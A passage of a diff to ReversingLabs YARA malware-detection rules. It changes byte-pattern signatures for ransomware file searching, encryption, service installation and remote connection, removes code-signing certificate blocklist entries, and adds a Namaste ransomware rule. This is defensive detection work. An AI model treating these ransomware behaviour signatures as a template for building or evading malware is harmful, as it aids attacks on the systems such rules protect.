?? 89 C6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 + ?? 8B 54 24 ?? 8B 0D ?? ?? ?? ?? 89 4C 24 ?? 89 7C 24 ?? 89 C6 89 D7 89 5C 24 ?? E9 + ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? 89 5C 24 ?? 8B 44 24 ?? + 89 44 24 ?? 8B 4C 24 ?? 89 0C 24 FF 54 24 ?? 83 EC ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 89 + 5C 24 ?? 8B 44 24 ?? 89 44 24 ?? 89 2C 24 E8 ?? ?? ?? ?? 89 5C 24 ?? 89 5C 24 ?? C7 + 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8D 44 24 ?? 89 44 24 ?? 89 6C 24 ?? C7 + 44 24 ?? ?? ?? ?? ?? 89 DA 31 F2 09 FA 0F 94 C0 0F B6 C0 89 44 24 ?? C7 44 24 ?? ?? + ?? ?? ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C3 FF 15 ?? ?? ?? ?? 85 + C0 78 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 89 + 6C 24 ?? 8B 4C 24 ?? 89 0C 24 FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? 2B 74 24 ?? 1B + 7C 24 ?? 89 FA 09 F2 74 ?? 8B 44 24 ?? 8B 58 ?? B8 ?? ?? ?? ?? 39 F8 0F 82 ?? ?? ?? + ?? 39 F3 0F 47 DE E9 ?? ?? ?? ?? 8B 7C 24 ?? 89 DE EB ?? 8B 7C 24 ?? BE ?? ?? ?? ?? + 85 ED 74 ?? 89 2C 24 E8 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 89 04 24 E8 + ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 7C 24 ?? BE ?? ?? ?? ?? EB + } + $encrypt_files_4 = { + FF 15 ?? ?? ?? ?? 83 EC ?? 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? + ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 + 34 24 89 54 24 ?? 89 44 24 ?? 89 4C 24 ?? FF 95 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? + ?? ?? ?? 8B 85 ?? ?? ?? ?? 29 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 19 95 ?? ?? ?? ?? 8B + 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 D0 89 CA 09 C2 0F 84 ?? ?? ?? ?? 31 D2 3B 95 ?? + ?? ?? ?? 8B 43 ?? 89 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 72 ?? 77 ?? 8B 8D ?? ?? ?? ?? + 39 C8 76 ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? + 89 85 ?? ?? ?? ?? 89 44 24 ?? 8D 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 54 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? + 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? 89 04 24 E8 ?? ?? ?? ?? 89 34 24 8B 35 ?? ?? ?? ?? FF D6 8B 85 ?? ?? ?? ?? 83 EC + ?? 89 04 24 FF D6 8B 85 ?? ?? ?? ?? 83 EC ?? 89 04 24 FF 15 ?? ?? ?? ?? 8B 8D ?? ?? + ?? ?? 83 EC ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 + 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? C7 04 24 ?? ?? + ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 40 ?? 8B 88 ?? ?? ?? ?? 85 C9 74 ?? 8B 01 C7 + 04 24 ?? ?? ?? ?? FF 50 ?? 83 EC ?? 0F B7 C0 B9 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? + 83 EC ?? 89 C1 E8 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + 89 04 24 FF 15 + } + $search_files_3 = { + FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 75 ?? 8B 85 + ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? + 8B 85 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 FF D7 83 + EC ?? 85 C0 0F 84 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? EB ?? 90 8D B4 26 ?? ?? ?? ?? 8B + 85 ?? ?? ?? ?? 83 C3 ?? 8B 50 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? 29 D0 C1 F8 ?? 69 C0 ?? + ?? ?? ?? 39 C3 0F 83 ?? ?? ?? ?? 8D 04 5B 8D 34 C5 ?? ?? ?? ?? 8B 04 C2 89 44 24 ?? + 8B 85 ?? ?? ?? ?? 89 04 24 FF D7 83 EC ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 8B + 1C 30 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? C7 04 + 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 5C + 24 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 40 ?? 8B 88 + ?? ?? ?? ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 01 C7 04 24 ?? ?? ?? ?? FF 50 ?? 83 EC ?? 0F + B7 C0 B9 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89 C1 E8 ?? ?? ?? ?? 31 F6 E9 + ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 + ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 5C 24 + ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? E9 ?? ?? ?? ?? 90 8D 74 26 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 + E8 + } + $install_service = { + FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 89 C1 89 44 24 ?? 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ?? + ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 0C 24 89 44 24 ?? FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 + 89 C3 0F 84 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? 8D 6C 24 ?? 8D 7C 24 ?? C7 44 24 ?? + ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 89 7C 24 ?? 89 44 24 ?? FF D0 83 EC + ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 83 E0 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? A1 ?? ?? + ?? ?? 89 44 24 ?? FF D0 8B 74 24 ?? 89 44 24 ?? 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? B8 + ?? ?? ?? ?? F7 64 24 ?? B8 ?? ?? ?? ?? C1 EA ?? 81 FA ?? ?? ?? ?? 0F 47 D0 B8 ?? ?? + ?? ?? 81 FA ?? ?? ?? ?? 0F 42 D0 89 14 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 6C 24 ?? C7 + 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 FF 54 24 ?? 83 EC + ?? 85 C0 74 ?? 3B 74 24 ?? 8B 44 24 ?? 72 ?? FF D0 2B 44 24 ?? 3B 44 24 ?? 76 ?? 89 + 1C 24 8B 1D ?? ?? ?? ?? FF D3 83 EC ?? 8B 44 24 ?? 89 04 24 FF D3 83 EC ?? 83 C4 ?? + 5B 5E 5F 5D C2 ?? ?? 8D B4 26 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 + EC ?? 83 C4 ?? 5B 5E 5F 5D C2 ?? ?? 8D B6 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 + 24 ?? ?? ?? ?? ?? 89 1C 24 FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? 89 6C 24 ?? C7 44 + 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 FF 54 24 ?? 83 EC ?? + 85 C0 0F 84 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 8B 44 24 ?? FF D0 8B 74 24 ?? 89 44 24 ?? + 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? F7 64 24 ?? B8 ?? ?? ?? ?? C1 EA ?? + 81 FA ?? ?? ?? ?? 0F 47 D0 B8 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 0F 42 D0 89 14 24 FF 15 + ?? ?? ?? ?? 83 EC ?? 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? + ?? ?? ?? 89 1C 24 FF 54 24 ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ?? 3B 74 24 ?? 72 ?? 8B + 44 24 ?? FF D0 2B 44 24 ?? 3B 44 24 ?? 76 ?? E9 + } + $encrypt_files_5 = { + FF 15 ?? ?? ?? ?? 83 EC ?? 89 C7 BE ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? C7 44 24 + ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? + ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 FF + 15 ?? ?? ?? ?? 83 EC ?? 89 C2 89 44 24 ?? 83 F8 ?? 74 ?? 8D 44 24 ?? 89 44 24 ?? 89 + 14 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C6 85 C0 75 ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? + ?? ?? 83 EC ?? 89 3C 24 FF 15 ?? ?? ?? ?? 83 EC ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? + ?? ?? 83 EC ?? 85 F6 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? + E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24 + ?? 89 44 24 ?? 89 54 24 ?? 8B 43 ?? 89 04 24 E8 ?? ?? ?? ?? 89 44 24 ?? 8B 73 ?? 89 + 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 04 B6 01 C0 89 44 24 ?? + 89 04 24 E8 ?? ?? ?? ?? 89 C5 C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? C7 44 + 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 89 3C 24 FF 15 ?? ?? ?? ?? 83 EC + ?? 89 C6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24 ?? 8B 0D ?? ?? ?? ?? 89 4C 24 + ?? 89 7C 24 ?? 89 C6 89 D7 89 5C 24 ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 + 24 ?? 89 44 24 ?? 89 5C 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 0C 24 FF 54 24 + ?? 83 EC ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 89 5C 24 ?? 8B 44 24 ?? 89 44 24 ?? 89 2C 24 + E8 ?? ?? ?? ?? 89 5C 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 + ?? 8D 44 24 ?? 89 44 24 ?? 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 DA 31 F2 09 FA 0F + 94 C0 0F B6 C0 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? + ?? ?? 83 EC ?? 89 C3 FF 15 ?? ?? ?? ?? 85 C0 78 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 + ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 89 6C 24 ?? 8B 4C 24 ?? 89 0C 24 FF 15 + } + $search_files_4 = { + FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? + ?? 89 C3 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 + 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 50 ?? 81 C2 ?? ?? ?? ?? 8B 42 ?? + 83 E0 ?? 83 C8 ?? 89 42 ?? 89 1C 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 C3 8B + 00 89 DA 03 50 ?? 8B 42 ?? 83 E0 ?? 83 C8 ?? 89 42 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? + ?? ?? 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ?? + ?? 83 EC ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 83 BB ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? + 89 04 24 89 D9 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 + ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 + 04 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8 ?? ?? + ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 + 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 3B BD ?? + ?? ?? ?? 75 ?? EB ?? 83 EC ?? 83 C7 ?? 39 BD ?? ?? ?? ?? 74 ?? 8B 45 ?? 89 44 24 ?? + 89 3C 24 89 D9 E8 ?? ?? ?? ?? EB ?? BE ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? + ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? + ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 + ?? ?? ?? ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 89 F0 8D 65 ?? 5B 5E 5F 5D C2 + } + $remote_connection_3 = { + 55 89 E5 57 56 53 83 EC ?? 89 4D ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 45 ?? 89 44 24 ?? C7 04 24 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? 8B 03 89 45 ?? EB ?? 83 EC ?? 89 45 ?? 85 C0 74 ?? 3D ?? ?? + ?? ?? 74 ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8D 45 ?? 89 + 44 24 ?? 8D 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? C7 44 24 + ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 45 ?? 83 7D ?? ?? + 74 ?? BE ?? ?? ?? ?? 8D 7D ?? EB ?? 83 EC ?? 8D 45 ?? 89 04 24 8D 4D ?? E8 ?? ?? ?? + ?? 83 EC ?? 8B 45 ?? 39 F8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C6 ?? 39 75 ?? 72 ?? 8B + 45 ?? 8B 5C B0 ?? 89 7D ?? B8 ?? ?? ?? ?? 85 DB 74 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 04 + 43 C6 44 24 ?? ?? 89 44 24 ?? 89 1C 24 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 04 + 24 E8 ?? ?? ?? ?? 83 EC ?? E9 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? C1 F8 ?? 69 C0 ?? ?? ?? + ?? 85 C0 74 ?? 8B 7D ?? 8D 9F ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 47 ?? 3B 47 ?? + 74 ?? 85 C0 74 ?? 8B 55 ?? 89 10 8D 48 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? + 8B 45 ?? 83 40 ?? ?? 89 1C 24 E8 ?? ?? ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 8D 45 ?? 89 04 + 24 E8 ?? ?? ?? ?? 83 EC ?? EB ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C2 ?? + ?? 89 C3 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? + ?? 89 1C 24 E8 ?? ?? ?? ?? 89 C3 EB ?? 53 83 EC ?? 8B 5C 24 ?? 8D 43 ?? 89 04 24 8B + 0B E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? C7 04 24 + ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 83 C4 ?? 5B C3 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "WORK PLACEMENTS INTERNATIONAL LIMITED" and (pe.signatures[i].serial=="00:8e:3d:89:c6:82:f7:c0:da:d7:01:10:cb:7b:7c:82:63" or pe.signatures[i].serial=="8e:3d:89:c6:82:f7:c0:da:d7:01:10:cb:7b:7c:82:63") and 1570626662<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and (($search_files and $encrypt_files and $remote_connection) or ($encrypt_files_2 and $remote_connection and $search_files) or ($search_files_2 and $encrypt_files_3 and $remote_connection_2) or ($install_service and $search_files_3 and $encrypt_files_4) or ($search_files_4 and $encrypt_files_5 and $remote_connection_3)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Ef2D35F2Ae82A767A16Be582Ab0D1Ba0 : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Namaste : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Namaste ransomware." author = "ReversingLabs" - id = "dc8f49b8-fda2-510c-8374-3261e75d11a9" - date = "2023-11-08" - modified = "2023-11-08" + id = "e85d7ec3-367b-5bde-a570-8caa1f6cd61b" + date = "2021-08-12" + modified = "2021-08-12" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5732-L5750" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0709290aeb18bcb855518e150c2768c24ab311f5c727cdc4c40145b879ff88b6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.Namaste.yara#L1-L81" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5a952276f41b5524bcb82a9ceb076983d2faf2864b3bbd0a06d49bbd5edc1e0e" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Namaste" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Workstage Limited" and (pe.signatures[i].serial=="00:ef:2d:35:f2:ae:82:a7:67:a1:6b:e5:82:ab:0d:1b:a0" or pe.signatures[i].serial=="ef:2d:35:f2:ae:82:a7:67:a1:6b:e5:82:ab:0d:1b:a0") and 1567123200<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_039668034826Df47E6207Ec9Daed57C3 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "c2a3477a-a4cf-586e-ba70-555cc577ab2c" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5752-L5768" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "792860feec6e599ba22ae3869ef132cf5b7be2e0572e23503e293444fd7c382d" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $find_files_p1 = { + 03 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 02 06 07 9A 28 ?? ?? ?? ?? 07 17 58 0B 07 06 8E 69 32 + ?? DE ?? 26 DE ?? 00 03 28 ?? ?? ?? ?? 0C 16 0D 2B ?? 08 09 9A 13 ?? 02 11 ?? 28 ?? ?? + ?? ?? 17 28 ?? ?? ?? ?? 09 17 58 0D 09 08 8E 69 32 ?? DE ?? 26 DE ?? 2A + } + $find_files_p2 = { + 02 7B ?? ?? ?? ?? 2D ?? 03 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 17 2A 03 6F ?? ?? ?? ?? + 0A 06 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F + ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? + ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 + 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? + ?? ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 + 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? + ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F + ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? + ?? 2D ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 16 2A 02 7B ?? ?? ?? ?? 2C ?? 03 72 ?? + ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 16 2A 02 7B ?? ?? ?? ?? 2D ?? 03 72 ?? ?? ?? ?? 6F ?? ?? + ?? ?? 2D ?? 16 2A 03 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 03 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? + 20 ?? ?? ?? ?? 6A 31 ?? 16 0C DE ?? DE ?? 26 DE ?? 02 28 ?? ?? ?? ?? 07 28 ?? ?? ?? ?? + 2A 08 2A + } + $encrypt_files_p1 = { + 02 03 28 ?? ?? ?? ?? 2C ?? 02 7B ?? ?? ?? ?? 2C ?? 02 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? + 02 7B ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2B ?? 02 03 72 + ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 02 7B ?? ?? ?? ?? 2C ?? 03 72 ?? ?? ?? ?? 6F + ?? ?? ?? ?? 2C ?? 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2A + } + $encrypt_files_p2 = { + 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 02 20 ?? ?? ?? + ?? 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? + ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? + ?? ?? ?? 28 ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1B 28 ?? ?? ?? ?? 28 + ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? + ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1F ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 1F + ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 2B ?? 12 ?? 28 ?? ?? ?? ?? 0B 02 07 + 28 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? + DC 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A + } + $encrypt_files_p3 = { + 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 26 73 ?? ?? ?? ?? 0A 06 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? + 06 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 18 6F ?? ?? ?? ?? 04 14 73 ?? ?? ?? ?? 0B 06 07 06 + 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 07 06 6F ?? ?? ?? ?? 1E 5B 6F ?? + ?? ?? ?? 6F ?? ?? ?? ?? 06 1A 6F ?? ?? ?? ?? 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 73 ?? + ?? ?? ?? 0C 08 06 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 0D 03 19 73 ?? ?? ?? ?? 13 ?? 20 ?? + ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 2B ?? 09 11 ?? 16 11 ?? 6F ?? ?? 